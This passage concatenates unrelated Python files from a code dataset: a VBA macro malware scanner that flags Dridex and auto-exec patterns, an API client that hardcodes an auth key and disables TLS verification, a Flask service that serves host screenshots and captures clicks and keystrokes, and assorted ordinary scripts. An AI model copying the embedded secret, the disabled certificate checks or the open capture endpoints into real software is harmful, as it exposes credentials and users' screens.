Optional[Union[int, float, np.ndarray]] = None,\n rng: Seed = None,\n ) -> Any:\n raise NotImplementedError\n\n\n# Processing/stage functions\nclass PrepareResultFunction(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n ) -> Any:\n raise NotImplementedError\n\n\n# Hook functions - to be composed/aggregated into processing/stage functions\nclass StopHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n ) -> bool:\n raise NotImplementedError\n\n\nclass InnerStopHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n elements: Elements,\n ) -> bool:\n raise NotImplementedError\n\n\nclass UpdateStateHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n ) -> None:\n raise NotImplementedError\n\n\nclass ProduceElementsHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n ) -> Elements:\n raise NotImplementedError\n\n\nclass ProcessElementsHook(Protocol):\n @staticmethod\n @abc.abstractmethod\n def __call__(\n state: ProcessingState,\n elements: Elements,\n ) -> Elements:\n raise NotImplementedError\n\n\n# Describable\nclass Describable(abc.ABC):\n @abc.abstractmethod\n def get_description_graph(self) -> DescriptionNode:\n \"\"\"Get a description graph.\n\n Prepare a description structure for the instance.\n\n Returns:\n A description graph structure representing the instance.\n \"\"\"\n\n @abc.abstractmethod\n def get_config_keys(self) -> List[str]:\n \"\"\"Get a list of \"config\" keys used by the instance and its descendants.\n\n Returns:\n A list of \"config\" keys used by the instance and its descendants.\n \"\"\"\n\n @abc.abstractmethod\n def get_input_data_keys(self) -> List[str]:\n \"\"\"Get a list of \"input\" keys used by the instance and its descendants.\n\n Returns:\n A list of \"input\" keys used by the instance and its descendants.\n \"\"\"\n\n @abc.abstractmethod\n def get_values_keys(self) -> List[str]:\n \"\"\"Get a list of \"values\" keys used by the instance and its descendants.\n\n Returns:\n A list of \"values\" keys used by the instance and its descendants.\n \"\"\"\n\n @staticmethod\n def _get_keys_from_elements(\n children: Sequence,\n inspect_keys_function: Callable,\n ) -> List[str]:\n return list(\n set(\n itertools.chain.from_iterable(\n [inspect_keys_function(child) for child in children],\n )\n )\n )\n","sub_path":"src/skrough/typing.py","file_name":"typing.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"216685440","text":"from oletools import olevba3\n\nfrom strelka import strelka\n\n\nclass ScanVba(strelka.Scanner):\n \"\"\"Extracts and analyzes VBA from document files.\n\n Options:\n analyze_macros: Boolean that determines if macros should be analyzed.\n Defaults to True.\n \"\"\"\n def scan(self, data, file, options, expire_at):\n analyze_macros = options.get('analyze_macros', True)\n\n self.event['total'] = {'files': 0, 'extracted': 0}\n\n try:\n vba = olevba3.VBA_Parser(filename=file.name, data=data)\n if vba.detect_vba_macros():\n extract_macros = list(vba.extract_macros())\n self.event['total']['files'] = len(extract_macros)\n for (filename, stream_path, vba_filename, vba_code) in extract_macros:\n extract_file = strelka.File(\n name=f'{vba_filename}',\n source=self.name,\n )\n\n for c in strelka.chunk_string(vba_code):\n 
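# Describable._get_keys_from_elements in skrough's typing.py above deduplicates
# keys gathered from all children via itertools.chain.from_iterable plus set().
# A standalone illustration with plain lists standing in for child key lists:
import itertools

children = [["a", "b"], ["b", "c"], ["c"]]
keys = list(set(itertools.chain.from_iterable(children)))
print(sorted(keys))  # ['a', 'b', 'c'] -- set iteration order is not stable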
self.upload_to_coordinator(\n extract_file.pointer,\n c,\n expire_at,\n )\n\n self.files.append(extract_file)\n self.event['total']['extracted'] += 1\n\n if analyze_macros:\n self.event.setdefault('auto_exec', [])\n self.event.setdefault('base64', [])\n self.event.setdefault('dridex', [])\n self.event.setdefault('hex', [])\n self.event.setdefault('ioc', [])\n self.event.setdefault('suspicious', [])\n macros = vba.analyze_macros()\n for (type, keyword, description) in macros:\n if type == 'AutoExec':\n self.event['auto_exec'].append(keyword)\n elif type == 'Base64 String':\n self.event['base64'].append(keyword)\n elif type == 'Dridex String':\n self.event['dridex'].append(keyword)\n elif type == 'Hex String':\n self.event['hex'].append(keyword)\n elif type == 'IOC':\n self.event['ioc'].append(keyword)\n elif type == 'Suspicious':\n self.event['suspicious'].append(keyword)\n\n except olevba3.FileOpenError:\n self.flags.append('file_open_error')\n finally:\n vba.close()\n","sub_path":"src/python/strelka/scanners/scan_vba.py","file_name":"scan_vba.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"632172527","text":"# all units on International System of Units\n# The position of each element (corner of concrete section and center of steel bars) have to be the same\nimport nFOC as nf\nimport numpy as np\n\n# Geometry\n## Concrete\nx_c = np.array([0,0.20,0.20,0,0])\ny_c = np.array([0,0,0.32,0.32,0]) \n\n### you can put your referential in any point. If not specified, the code will center in the center of mass\nreinforced_concrete_section = nf.Section(x_c,y_c)\nx_c=reinforced_concrete_section.x_c\ny_c=reinforced_concrete_section.y_c\n\n## Steel\nsteel_bar_diameter = 10e-3\nsteel_bar_areas = ( np.pi * (steel_bar_diameter**2) / 4 ) * np.array([1, 1, 1, 1, 1, 1]) \nx_s = np.array([0.05, 0.05, 0.05, 0.15, 0.15, 0.15])\ny_s = np.array([0.05, 0.16, 0.27, 0.05, 0.16, 0.27])\n\nreinforced_concrete_section.define_reinforcing_bars(x_s, y_s, steel_bar_areas)\nrebar=reinforced_concrete_section.rebar\n\n'''\nThis is a matrix where the first column is the x-position \nand second column is the y-position of each steel bar.\nThe third column is the area of the respective steel bar.\n'''\n# Material\n## Concrete\nf_ck = 30\n\n## Steel\nsteel = 50\n\n# Vizualise the concrete section and reinforcing bar\nreinforced_concrete_section.showSection()\n\n# Sample - uniform compression\n\n(epsilon0 , kx, ky) = (2 , 0 , 0)\n\nNs = nf.Ns(rebar , steel , epsilon0 , kx , ky)\nMsx = nf.Msx(rebar , steel , epsilon0 , kx , ky)\nMsy = nf.Msy(rebar , steel , epsilon0 , kx , ky)\n\nNc = nf.Nc( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcx = nf.Mcx( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcy = nf.Mcy( x_c , y_c , f_ck , epsilon0 , kx, ky )\nprint('----')\nprint(\"%.4f\" % (Ns/1e6)) # = 0.1979 MN\nprint(\"%.4f\" % (Msx/1e6)) # ~ 0\nprint(\"%.4f\" % (Msy/1e6)) # ~ 0\nprint(\"%.4f\" % (Nc/1e6)) # = 1.1657 MN.m\nprint(\"%.4f\" % (Mcx/1e6)) # ~ 0\nprint(\"%.4f\" % (Mcy/1e6)) # ~ 0\n\n# Sample - uniform traction\n(epsilon0 , kx, ky) = (-10 , 0 , 0)\n\nNs = nf.Ns(rebar , steel , epsilon0 , kx , ky)\nMsx = nf.Msx(rebar , steel , epsilon0 , kx , ky)\nMsy = nf.Msy(rebar , steel , epsilon0 , kx , ky)\n\nNc = nf.Nc( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcx = nf.Mcx( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcy = nf.Mcy( x_c , y_c , f_ck , epsilon0 , kx, ky )\nprint('----')\nprint(\"%.4f\" % (Ns/1e6)) # = -0.2049 MN\nprint(\"%.4f\" % (Msx/1e6)) # 
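# In ScanVba.scan above, vba.close() sits in a finally block, but if
# olevba3.VBA_Parser(...) itself raises FileOpenError, the name `vba` is never
# bound and the finally clause raises NameError instead. A hedged sketch of the
# safer shape; `make_parser` is a hypothetical stand-in for the olevba3 call:
def scan_sketch(make_parser):
    vba = None
    try:
        vba = make_parser()
        # ... detect and extract macros here ...
    finally:
        if vba is not None:  # only close a parser that was actually created
            vba.close()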
~ 0\nprint(\"%.4f\" % (Msy/1e6)) # ~ 0\nprint(\"%.4f\" % (Nc/1e6)) # ~ 0\nprint(\"%.4f\" % (Mcx/1e6)) # ~ 0\nprint(\"%.4f\" % (Mcy/1e6)) # ~ 0\n\n# Sample 2 - ELU being transpassed\n(epsilon0 , kx, ky) = (2 , -6.25 , 0)\n\nNs = nf.Ns(rebar , steel , epsilon0 , kx , ky)\nMsx = nf.Msx(rebar , steel , epsilon0 , kx , ky)\nMsy = nf.Msy(rebar , steel , epsilon0 , kx , ky)\n\nNc = nf.Nc( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcx = nf.Mcx( x_c , y_c , f_ck , epsilon0 , kx, ky )\nMcy = nf.Mcy( x_c , y_c , f_ck , epsilon0 , kx, ky )\nprint('----')\nprint(\"%.4f\" % (Ns/1e6)) # = 0.1776 MN\nprint(\"%.4f\" % (Msx/1e6)) # = -0.0028 MN.m\nprint(\"%.4f\" % (Msy/1e6)) # ~ 0\nprint(\"%.4f\" % (Nc/1e6)) # = 1.1171 MN\nprint(\"%.4f\" % (Mcx/1e6)) # = -0.0058 MN.m\nprint(\"%.4f\" % (Mcy/1e6)) # ~ 0\n\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"303549570","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# coding=UTF-8\n\nfrom functools import partial\nimport argparse\nimport os\nimport sys\nimport random\nimport time\n\nimport numpy as np\nimport hnswlib\nimport paddle\nimport paddle.nn.functional as F\nimport paddlenlp as ppnlp\nfrom paddlenlp.data import Stack, Tuple, Pad\nfrom paddlenlp.datasets import load_dataset, MapDataset, load_dataset\nfrom paddlenlp.utils.log import logger\n\nfrom base_model import SemanticIndexBase\nfrom data import convert_example, create_dataloader\nfrom data import gen_id2corpus, gen_text_file\nfrom ann_util import build_index\n\n# yapf: disable\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--corpus_file\", type=str, required=True, help=\"The full path of input file\")\nparser.add_argument(\"--similar_text_pair_file\", type=str, required=True, help=\"The full path of similar text pair file\")\nparser.add_argument(\"--recall_result_dir\", type=str, default='recall_result', help=\"The full path of recall result file to save\")\nparser.add_argument(\"--recall_result_file\", type=str, default='recall_result_file', help=\"The file name of recall result\")\nparser.add_argument(\"--params_path\", type=str, required=True, help=\"The path to model parameters to be loaded.\")\nparser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length after tokenization. 
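# The rebar areas in the nFOC section test above come from A = pi * d^2 / 4.
# A quick numeric check for the 10 mm bars used there:
import numpy as np

area = np.pi * (10e-3) ** 2 / 4
print(area)  # ~7.854e-05 m^2, i.e. about 78.5 mm^2 per bar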
\"\n \"Sequences longer than this will be truncated, sequences shorter will be padded.\")\nparser.add_argument(\"--batch_size\", default=32, type=int, help=\"Batch size per GPU/CPU for training.\")\nparser.add_argument(\"--output_emb_size\", default=None, type=int, help=\"output_embedding_size\")\nparser.add_argument(\"--recall_num\", default=10, type=int, help=\"Recall number for each query from Ann index.\")\n\nparser.add_argument(\"--hnsw_m\", default=100, type=int, help=\"Recall number for each query from Ann index.\")\nparser.add_argument(\"--hnsw_ef\", default=100, type=int, help=\"Recall number for each query from Ann index.\")\nparser.add_argument(\"--hnsw_max_elements\", default=1000000, type=int, help=\"Recall number for each query from Ann index.\")\n\nparser.add_argument('--device', choices=['cpu', 'gpu'], default=\"gpu\", help=\"Select which device to train model, defaults to gpu.\")\nargs = parser.parse_args()\n# yapf: enable\n\nif __name__ == \"__main__\":\n paddle.set_device(args.device)\n rank = paddle.distributed.get_rank()\n if paddle.distributed.get_world_size() > 1:\n paddle.distributed.init_parallel_env()\n\n tokenizer = ppnlp.transformers.ErnieTokenizer.from_pretrained('ernie-1.0')\n\n trans_func = partial(\n convert_example,\n tokenizer=tokenizer,\n max_seq_length=args.max_seq_length)\n\n batchify_fn = lambda samples, fn=Tuple(\n Pad(axis=0, pad_val=tokenizer.pad_token_id), # text_input\n Pad(axis=0, pad_val=tokenizer.pad_token_type_id), # text_segment\n ): [data for data in fn(samples)]\n\n pretrained_model = ppnlp.transformers.ErnieModel.from_pretrained(\n \"ernie-1.0\")\n\n model = SemanticIndexBase(\n pretrained_model, output_emb_size=args.output_emb_size)\n model = paddle.DataParallel(model)\n\n # Load pretrained semantic model\n if args.params_path and os.path.isfile(args.params_path):\n state_dict = paddle.load(args.params_path)\n model.set_dict(state_dict)\n logger.info(\"Loaded parameters from %s\" % args.params_path)\n else:\n raise ValueError(\n \"Please set --params_path with correct pretrained model file\")\n\n id2corpus = gen_id2corpus(args.corpus_file)\n\n # conver_example function's input must be dict\n corpus_list = [{idx: text} for idx, text in id2corpus.items()]\n corpus_ds = MapDataset(corpus_list)\n\n corpus_data_loader = create_dataloader(\n corpus_ds,\n mode='predict',\n batch_size=args.batch_size,\n batchify_fn=batchify_fn,\n trans_fn=trans_func)\n\n # Need better way to get inner model of DataParallel\n inner_model = model._layers\n\n final_index = build_index(args, corpus_data_loader, inner_model)\n\n text_list, text2similar_text = gen_text_file(args.similar_text_pair_file)\n\n query_ds = MapDataset(text_list)\n\n query_data_loader = create_dataloader(\n query_ds,\n mode='predict',\n batch_size=args.batch_size,\n batchify_fn=batchify_fn,\n trans_fn=trans_func)\n\n query_embedding = inner_model.get_semantic_embedding(query_data_loader)\n\n if not os.path.exists(args.recall_result_dir):\n os.mkdir(args.recall_result_dir)\n\n recall_result_file = os.path.join(args.recall_result_dir,\n args.recall_result_file)\n with open(recall_result_file, 'w', encoding='utf-8') as f:\n for batch_index, batch_query_embedding in enumerate(query_embedding):\n recalled_idx, cosine_sims = final_index.knn_query(\n batch_query_embedding.numpy(), args.recall_num)\n\n batch_size = len(cosine_sims)\n\n for row_index in range(batch_size):\n text_index = args.batch_size * batch_index + row_index\n for idx, doc_idx in enumerate(recalled_idx[row_index]):\n 
f.write(\"{}\\t{}\\t{}\\n\".format(text_list[text_index][\n \"text\"], id2corpus[doc_idx], 1.0 - cosine_sims[\n row_index][idx]))\n","sub_path":"examples/semantic_indexing/recall.py","file_name":"recall.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"134479131","text":"import requests\nimport hashlib,time,re\nimport constant.device as Device\n\ndef getBrokerForDevice():\n url = 'http://xcloud.dev.xcharger.net/Addr/getBrokerForDevice/v1.0'\n\n #签名 = MD5(sourceId+timestamp+nonce+authKey)\n timestamp = time.strftime('%Y%m%d%H%M%S', time.localtime())\n src = 'C601170914SZYHQZIG' + timestamp + \"1\" + 'eJm99EfmYXuTyG3F'\n m2 = hashlib.md5()\n m2.update(src.encode(\"utf-8\"))\n signature = m2.hexdigest()\n\n json_body = {\n 'sourceId':'C601170914SZYHQZIG',\n 'timestamp':timestamp,\n 'nonce':'1',\n 'signature':signature,\n 'secure':False\n }\n res = requests.post(url,json=json_body,verify=False)\n result = res.json()['result']\n pattern =\"[\\d{1,3}.]+\\d{1,3}\"\n hostname = re.findall(pattern,result)[0]\n return hostname\n\nif __name__ == '__main__':\n # timestamp = time.strftime('%Y%m%d%H%M%S',time.localtime())\n # str = Device.SN_C2_01 + timestamp + '2' + Device.auth_key_C2_01\n # h1 = hashlib.md5()\n # h1.update(str.encode(encoding='utf-8'))\n # print('之前',str)\n # print('之后',h1.hexdigest())\n res = getBrokerForDevice()\n print(res)\n","sub_path":"Activemq/getbrokerfordevice.py","file_name":"getbrokerfordevice.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"266487248","text":"'''\nSimple encrypt/decrypt program.\nWorks using the Atbash cipher, in which every\nletter is reversed. E.g, A becomes Z, B becomes Y etc.\nThe easy thing about this is that to decrypt the output,\nyou just have to encrypt it again.\n'''\n\n#List of alphabet characters.\nalphabet = list(\"abcdefghijklmnopqrstuvwxyz\")\n\n#The atbash encrypt/decrypt function.\ndef encrypt_decrypt(plaintext):\n\t#offset is how many from the end the new character is.\n\t#e.g, if letter = a. new letter = z. offset = 1. 
\n\toffset = 0\n\t#result is the empty string we're going to be appending the new letters to.\n\tresult = \"\"\n\n\t#iterate through the whole plaintext word.\n\tfor i in range(0, len(plaintext)):\n\t\t#Compare each letter against the alphabet list.\n\t\tfor letter in alphabet:\n\t\t\t#if the letter at i in plaintext matches the alphabet letter:\n\t\t\tif plaintext[i] == letter:\n\t\t\t\t#offset = the alphabet length - the index in alphabet where the letter at i is.\n\t\t\t\toffset = (len(alphabet) - 1) - alphabet.index(plaintext[i])\n\t\t\t\t#Append the letter of the alphabet that is at this offset.\n\t\t\t\tresult += alphabet[offset]\n\t\t#If we find a space\n\t\tif plaintext[i] == \" \":\n\t\t\t#append space to result\n\t\t\tresult += \" \"\n\n\treturn result\n\n\ndef main():\n\t#Always get input, unless user hits enter with nothing.\n\twhile True:\n\t\tprint(\"Enter a string to 'encrypt' or 'decrypt' using the atbash cipher: \")\n\t\tuser_input = str(input(\"> \"))\n\t\tif user_input.isdigit():\n\t\t\tprint(\"Please enter a string!\")\n\t\telif user_input == \"\":\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"# \" + encrypt_decrypt(user_input.lower()))\n\t\t\tprint(\"-----------------------------------------------------------------\")\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"04_encryption_decryption/encrypt_decrypt.py","file_name":"encrypt_decrypt.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"17407111","text":"\"\"\"Command to run cron-based schedules.\"\"\"\nimport datetime\nimport logging\nimport time\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.utils.timezone import now\nimport pytz\n\nfrom core.models import OffScheduleConstraint, OnScheduleConstraint, RealPerson, Unit\nfrom x10.interface import FirecrackerException\nfrom x10.lock import CacheLockException\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n \"\"\"Command to run crontab schedules.\"\"\"\n\n help = 'Runs the crontab schedule events for units.'\n\n def add_arguments(self, parser):\n \"\"\"Add arguments to the command.\"\"\"\n parser.add_argument(\n '-i', '--interval',\n help='How often the schedules should be checked, in seconds',\n type=int,\n default=5 * 60)\n\n def handle(self, *args, **options):\n \"\"\"Runtime for command.\"\"\"\n # set up logging levels\n verbosity = options.get('verbosity')\n if verbosity == 0:\n logger.setLevel(logging.WARN)\n elif verbosity == 1:\n logger.setLevel(logging.INFO)\n elif verbosity > 1:\n logger.setLevel(logging.DEBUG)\n\n # get the interval and create a time delta\n interval = options.get('interval')\n self.delta = datetime.timedelta(seconds=interval)\n\n # used only for logging times\n self.tz = pytz.timezone(settings.TIME_ZONE)\n\n while True:\n current_time = now()\n logger.debug(f'starting check at {current_time.astimezone(self.tz)}')\n\n # if a person is not home, exclude the schedules that require someone to be home\n qs_filter = {}\n if not RealPerson.is_home():\n qs_filter['if_home'] = True\n\n # get all of the on schedules\n on_constraints = OnScheduleConstraint.objects.exclude(**qs_filter)\n off_constraints = OffScheduleConstraint.objects.exclude(**qs_filter)\n\n self.run_actions(on_constraints, current_time, Unit.ON_ACTION)\n self.run_actions(off_constraints, current_time, Unit.OFF_ACTION)\n\n # get the duration of the loop\n finish_time = now()\n duration = finish_time - 
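# The loop-based cipher above can also be expressed with a translation table.
# Atbash is an involution, so applying it twice returns the original text; like
# the original (which lowercases its input), this sketch handles lowercase only:
import string

TABLE = str.maketrans(string.ascii_lowercase, string.ascii_lowercase[::-1])

def atbash(text):
    return text.translate(TABLE)

assert atbash(atbash("hello world")) == "hello world"
print(atbash("hello world"))  # svool dliow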
current_time\n logger.debug(f'loop duration was {duration}')\n\n # schedule the next loop to run to stay within the interval time\n wait_sec = interval - duration.total_seconds()\n if duration.total_seconds() > interval:\n logger.warning(f'execution time exceeds interval, skipping next loop')\n wait_sec += interval\n\n # sleep until the next loop\n logger.debug(f'sleeping {wait_sec} seconds...')\n time.sleep(wait_sec)\n\n def run_actions(self, constraints, current_time: datetime, action: str):\n \"\"\"Run actions for a set of schedule constraints.\n\n :param constraints: the queryset of schedule constraints to loop through\n :param current_time: the current time to calculate the next event time\n :param action: the command to be sent\n \"\"\"\n for c in constraints:\n # get the next event time for the schedule\n event_time = c.schedule.next_time(current_time)\n logger.debug(f'{c.schedule} next event time is at {event_time.astimezone(self.tz)}')\n\n # get the next time the loop will run\n next_run = current_time + self.delta\n logger.debug(f'next run is at {next_run.astimezone(self.tz)}')\n\n if next_run > event_time:\n # the next time the loop will run exceeds the next scheduled time, run now\n logger.info(f'turning {c.unit} {action}')\n try:\n c.unit.send_signal(action)\n except (CacheLockException, FirecrackerException) as e:\n logger.exception(e)\n","sub_path":"src/core/management/commands/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"481526875","text":"# tr_bimini.py william k. johnson 2016\n\nimport os\nimport sys\nfrom StringIO import StringIO\nimport logging\nfrom flask import Flask , request , send_file , render_template , url_for\n\n#cci\nimport tr_trinity\n\nfrom application import app\n\nlog_format = '%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s'\n\n# logger\n_logger = logging.getLogger( \"tr_bimini\" )\n_logger.setLevel( logging.DEBUG )\nfh = logging.FileHandler( 'tr_bimini.log' + '-debug.log', mode = 'a' )\nfh.setLevel( logging.DEBUG )\nformatter = logging.Formatter( log_format )\nfh.setFormatter( formatter )\n_logger.addHandler( fh )\n\n\n\n\n# ------------------------------------------------------------------------------\n@app.route( \"/bimini\" )\ndef cci_trinity():\n\n\t\t\tout = 'cci_trinity capture screen...'\n\t\t\tio = StringIO()\n\t\t\ttry :\n\n\t\t\t\tb_ret , out = tr_trinity.capture_screen( _logger )\n\t\t\t\tif not b_ret :\n\t\t\t\t\t_logger.error( out )\n\t\t\t\telse :\n\t\t\t\t\tio.write( out )\n\t\t\t\t\tio.seek( 0 )\n\n\n\t\t\texcept Exception as e :\n\t\t\t\tout = 'error in cci_trinity.....' 
+ e.message\n\t\t\t\t_logger.error( out )\n\t\t\t\treturn\n\n\t\t\treturn send_file( io , mimetype='image/png' )\n\napp.add_url_rule( '/bimini' ,\n\t\t\t\t 'cci_trinity' ,\n\t\t\t\t view_func=cci_trinity ,\n\t\t\t\t methods=['GET'] )\n\n\n\n\n# ------------------------------------------------------------------------\n@app.route('/bimini/click')\ndef click() :\n\t\t\t\"\"\"\n\n\t\t\t:return:\n\t\t\t\"\"\"\n\n\t\t\treturn tr_trinity.capture_clicks( log = _logger ,\n\t\t\t\t\t\t\t\t\t\t request = request )\n\napp.add_url_rule( '/bimini/click' ,\n\t\t\t\t 'click' ,\n\t\t\t\t view_func=click ,\n\t\t\t\t methods=['GET'] )\n\n\n\n\n# ------------------------------------------------------------------------\n@app.route('/bimini/key')\ndef key() :\n\t\t\t\"\"\"\n\n\t\t\t:return:\n\t\t\t\"\"\"\n\n\t\t\treturn tr_trinity.capture_keys( log = _logger ,\n\t\t\t\t\t\t\t\t\t\t request = request )\n\napp.add_url_rule( '/bimini/key' ,\n\t\t\t\t 'key' ,\n\t\t\t\t view_func=key ,\n\t\t\t\t methods=['GET'] )\n\n\n","sub_path":"cci-mobile/trinity/streams/tr_bimini.py","file_name":"tr_bimini.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"251624471","text":"#!/mnt/d/software/python/python.exe -B\n\ninput_file = open('day_17_input.txt', 'r')\ninput_data = [list(line.strip()) for line in input_file]\n\ndef vec_add(v1, v2):\n return tuple(x + y for x, y in zip(v1, v2))\n\ndef neighbors_count(cube, board, offset):\n return sum([vec_add(cube, cube_off) in board for cube_off in offset])\n\ndef simulate(board, cycles, get_boundries, offset):\n for i in range(cycles):\n new_board = board.copy()\n for cube in get_boundries(board):\n neighbors = neighbors_count(cube, board, offset)\n if cube in board and neighbors not in (2, 3):\n new_board.remove(cube)\n elif cube not in board and neighbors == 3:\n new_board.add(cube)\n board = new_board\n\n return board\n\nboard_3d = set()\nboard_4d = set()\nfor y in range(len(input_data)):\n for x in range(len(input_data[y])):\n if input_data[y][x] == '#':\n board_3d.add((x, y, 0))\n board_4d.add((x, y, 0, 0))\n\noffset_3d = []\noffset_4d = []\nfor x in (-1, 0, 1):\n for y in (-1, 0, 1):\n for z in (-1, 0, 1):\n for w in (-1, 0, 1):\n offset_4d.append((x, y, z, w))\n offset_3d.append((x, y, z))\noffset_3d.remove((0, 0, 0))\noffset_4d.remove((0, 0, 0, 0))\n\n# Part One\n\ndef get_boundries_3d(board_3d):\n mins = [min(board_3d, key=lambda x: x[i])[i] - 1 for i in range(3)]\n maxs = [max(board_3d, key=lambda x: x[i])[i] + 1 for i in range(3)]\n for x in range(mins[0], maxs[0] + 1):\n for y in range(mins[1], maxs[1] + 1):\n for z in range(mins[2], maxs[2] + 1):\n yield (x, y, z)\n\nboard_3d = simulate(board_3d, 6, get_boundries_3d, offset_3d)\nactive = len(board_3d)\nprint(active)\n\n# Part Two\n\ndef get_boundries_4d(board_4d):\n mins = [min(board_4d, key=lambda x: x[i])[i] - 1 for i in range(4)]\n maxs = [max(board_4d, key=lambda x: x[i])[i] + 1 for i in range(4)]\n for x in range(mins[0], maxs[0] + 1):\n for y in range(mins[1], maxs[1] + 1):\n for z in range(mins[2], maxs[2] + 1):\n for w in range(mins[3], maxs[3] + 1):\n yield (x, y, z, w)\n\nboard_4d = simulate(board_4d, 6, get_boundries_4d, offset_4d)\nactive = len(board_4d)\nprint(active)\n","sub_path":"2020/day_17/day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"463444575","text":"#!/usr/bin/env 
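# The nested loops building offset_3d/offset_4d in day_17.py above have an
# equivalent, shorter form with itertools.product; any(d) drops the all-zero
# offset, leaving 3^3 - 1 = 26 and 3^4 - 1 = 80 neighbour directions:
import itertools

offset_3d = [d for d in itertools.product((-1, 0, 1), repeat=3) if any(d)]
offset_4d = [d for d in itertools.product((-1, 0, 1), repeat=4) if any(d)]
print(len(offset_3d), len(offset_4d))  # 26 80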
python3\n# -*- coding:utf-8 -*-\n\nfrom sqlalchemy import *\nfrom sqlalchemy.orm import *\n\nengine = create_engine('sqlite:///./data/databases.db', echo=True)\n\nmetadata = MetaData(engine)\n\nenglish_words = Table('english_words', metadata,\n Column('id', Integer, primary_key=True, autoincrement=True),\n Column('word', String(50)),\n Column('term_frequency', Integer),\n Column('images', Text),\n Column('ext', Text))\n\nenglish_words.create()\n\n","sub_path":"recite_english_words/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"439740523","text":"import os\nimport os.path\nfrom PIL import Image\nfrom PIL import ImageFilter\nimport numpy as np\nimport keras\nimport pandas as pd\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nfrom keras.models import Sequential\nfrom keras.layers import Input\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import applications\nfrom keras.models import Sequential,Model,load_model\nfrom keras.applications.vgg16 import VGG16\nimport math\nimport sys\n\ntrain11 = sys.argv[1]\nmode = sys.argv[2]\n\ntarget_names = ['daisy','dandelion','rose','sunflower','tulips']\nimage_height = 150\nimage_width = 150\nbatch_size = 32\ntrain_datagen = ImageDataGenerator(\n rescale=1./255.,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n validation_split = 0.2)\n\ntrain_generator = train_datagen.flow_from_directory(\n train11,\n target_size=(image_height, image_width),\n color_mode=\"rgb\",\n batch_size=batch_size,\n class_mode='categorical',\n subset = 'training',\n shuffle=False)\nvalid_generator = train_datagen.flow_from_directory(\n train11,\n target_size=(image_height, image_width),\n color_mode=\"rgb\",\n batch_size=batch_size,\n subset = 'validation',\n class_mode='categorical',\n shuffle=False)\n# Function to get labels from generators to separate them\ndef get_labels(gen):\n labels = []\n sample_no = len(gen.filenames)\n call_no = int(math.ceil(sample_no / batch_size))\n for i in range(call_no):\n labels.extend(np.array(gen[i][1]))\n \n return np.array(labels)\n\nbase_model = VGG16(weights='imagenet', include_top=False,input_shape = (150,150,3))\n\n#train_data = np.array(base_model.predict_generator(train_generator))\n#train_labels = get_labels(train_generator)\nvalid_data = np.array(base_model.predict_generator(valid_generator))\nvalid_labels = get_labels(valid_generator)\n\nmodel = load_model(mode)\n\n\ndef test():\n\tmm = model.evaluate(valid_data,valid_labels)\n\tprint('Accuracy:', round(mm[1],2))\n\tprint('Test Error:', round(1-mm[1],2))\n\ntest()\n","sub_path":"CNN_Kaggle_Various_Datasets/flowers_test.py","file_name":"flowers_test.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"402088771","text":"import torch.utils.data as data\r\nimport os, cv2\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom glob import glob\r\nimport 